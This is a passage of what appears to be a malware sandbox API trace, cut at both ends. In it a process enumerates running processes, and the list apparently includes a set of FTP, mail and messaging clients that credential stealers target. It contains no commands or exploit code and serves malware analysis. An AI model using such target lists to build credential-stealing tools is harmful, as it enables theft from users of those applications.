lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.495] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.497] GetTickCount () returned 0x117257e [0092.497] GetCurrentThreadId () returned 0x8c4 [0092.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.497] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0092.498] GetTickCount () returned 0x117257e [0092.498] GetCurrentThreadId () returned 0x8c4 [0092.498] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.498] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.498] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x42c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0092.499] GetTickCount () returned 0x117257e [0092.499] GetCurrentThreadId () returned 0x8c4 [0092.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.499] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.499] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0092.501] GetTickCount () returned 0x117257e [0092.501] GetCurrentThreadId () returned 0x8c4 [0092.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.501] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.501] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0092.502] GetTickCount () returned 0x117257e [0092.502] GetCurrentThreadId () returned 0x8c4 [0092.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.502] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.502] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.504] GetTickCount () returned 0x117257e [0092.504] GetCurrentThreadId () returned 0x8c4 [0092.504] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.504] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.504] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0092.505] GetTickCount () returned 0x117257e [0092.505] GetCurrentThreadId () returned 0x8c4 [0092.505] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.505] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.505] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0092.507] GetTickCount () returned 0x117257e [0092.507] GetCurrentThreadId () returned 0x8c4 [0092.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.507] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.508] GetTickCount () returned 0x117257e [0092.508] GetCurrentThreadId () returned 0x8c4 [0092.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.508] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0092.510] GetTickCount () returned 0x117257e [0092.510] GetCurrentThreadId () returned 0x8c4 [0092.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.510] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.511] GetTickCount () returned 0x117257e [0092.511] GetCurrentThreadId () returned 0x8c4 [0092.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.511] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x734, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="carnival_surprising_ii.exe")) returned 1 [0092.512] GetTickCount () returned 0x117258e [0092.512] GetCurrentThreadId () returned 0x8c4 [0092.513] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.513] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="humor jordan.exe")) returned 1 [0092.514] GetTickCount () returned 0x117258e [0092.514] GetCurrentThreadId () returned 0x8c4 [0092.514] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.514] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.514] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0092.515] GetTickCount () returned 0x117258e [0092.515] GetCurrentThreadId () returned 0x8c4 [0092.515] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.515] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.515] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="culture.exe")) returned 1 [0092.517] GetTickCount () returned 0x117258e [0092.517] GetCurrentThreadId () returned 0x8c4 [0092.517] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.517] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.517] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="h produces routers.exe")) returned 1 [0092.518] GetTickCount () returned 0x117258e [0092.518] GetCurrentThreadId () returned 0x8c4 [0092.518] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.518] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.518] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="hacameras.exe")) returned 1 [0092.519] GetTickCount () returned 0x117258e [0092.519] GetCurrentThreadId () returned 0x8c4 [0092.519] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.520] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.520] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud.exe")) returned 1 [0092.521] GetTickCount () returned 0x117258e [0092.521] GetCurrentThreadId () returned 0x8c4 [0092.521] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.521] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.521] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="chinaassumedtalent.exe")) returned 1 [0092.522] GetTickCount () returned 0x117258e [0092.522] GetCurrentThreadId () returned 0x8c4 [0092.522] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.522] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.522] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="assessed.exe")) returned 1 [0092.524] GetTickCount () returned 0x117258e [0092.524] GetCurrentThreadId () returned 0x8c4 [0092.524] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.524] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.524] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="thanksgiving.exe")) returned 1 [0092.525] GetTickCount () returned 0x117258e [0092.525] GetCurrentThreadId () returned 0x8c4 [0092.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.525] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.525] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="madagascar_fault_blades.exe")) returned 1 [0092.527] GetTickCount () returned 0x117258e [0092.527] GetCurrentThreadId () returned 0x8c4 [0092.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.527] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.527] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x698, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="manufacturing pharmacology forge.exe")) returned 1 [0092.528] GetTickCount () returned 0x117259e [0092.528] GetCurrentThreadId () returned 0x8c4 [0092.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.528] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.528] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="boards.exe")) returned 1 [0092.530] GetTickCount () returned 0x117259e [0092.530] GetCurrentThreadId () returned 0x8c4 [0092.530] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.530] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.530] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="lack-shadow.exe")) returned 1 [0092.531] GetTickCount () returned 0x117259e [0092.531] GetCurrentThreadId () returned 0x8c4 [0092.531] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.531] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="flood_suspension.exe")) returned 1 [0092.533] GetTickCount () returned 0x117259e [0092.533] GetCurrentThreadId () returned 0x8c4 [0092.533] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.533] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.533] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="henderson.exe")) returned 1 [0092.534] GetTickCount () returned 0x117259e [0092.534] GetCurrentThreadId () returned 0x8c4 [0092.534] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.534] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.534] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="switzerland.exe")) returned 1 [0092.536] GetTickCount () returned 0x117259e [0092.536] GetCurrentThreadId () returned 0x8c4 [0092.536] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.536] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.536] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="advertisers_palmer.exe")) returned 1 [0092.537] GetTickCount () returned 0x117259e [0092.537] GetCurrentThreadId () returned 0x8c4 [0092.537] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.537] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.537] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="itself-profit.exe")) returned 1 [0092.539] GetTickCount () returned 0x117259e [0092.539] GetCurrentThreadId () returned 0x8c4 [0092.539] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.539] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.539] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0092.540] GetTickCount () returned 0x117259e [0092.540] GetCurrentThreadId () returned 0x8c4 [0092.540] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.540] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.540] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0092.541] GetTickCount () returned 0x117259e [0092.542] GetCurrentThreadId () returned 0x8c4 [0092.542] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.542] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0092.543] GetTickCount () returned 0x117259e [0092.543] GetCurrentThreadId () returned 0x8c4 [0092.543] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.543] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.543] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0092.546] GetTickCount () returned 0x11725ad [0092.546] GetCurrentThreadId () returned 0x8c4 [0092.546] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.546] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.546] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0092.547] GetTickCount () returned 0x11725ad [0092.547] GetCurrentThreadId () returned 0x8c4 [0092.547] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.547] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.547] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0092.548] GetTickCount () returned 0x11725ad [0092.549] GetCurrentThreadId () returned 0x8c4 [0092.549] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.549] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.549] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0092.550] GetTickCount () returned 0x11725ad [0092.550] GetCurrentThreadId () returned 0x8c4 [0092.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.550] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.550] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x91c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0092.551] GetTickCount () returned 0x11725ad [0092.551] GetCurrentThreadId () returned 0x8c4 [0092.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.551] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.551] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0092.552] GetTickCount () returned 0x11725ad [0092.552] GetCurrentThreadId () returned 0x8c4 [0092.552] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.553] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.553] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x93c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0092.554] GetTickCount () returned 0x11725ad [0092.554] GetCurrentThreadId () returned 0x8c4 [0092.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.554] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x94c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0092.555] GetTickCount () returned 0x11725ad [0092.555] GetCurrentThreadId () returned 0x8c4 [0092.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.555] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x95c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0092.557] GetTickCount () returned 0x11725ad [0092.557] GetCurrentThreadId () returned 0x8c4 [0092.557] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.557] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.557] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x96c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0092.558] GetTickCount () returned 0x11725ad [0092.558] GetCurrentThreadId () returned 0x8c4 [0092.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0092.558] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0092.558] Process32Next (in: hSnapshot=0x6f4, lppe=0x9ccf258 | out: lppe=0x9ccf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 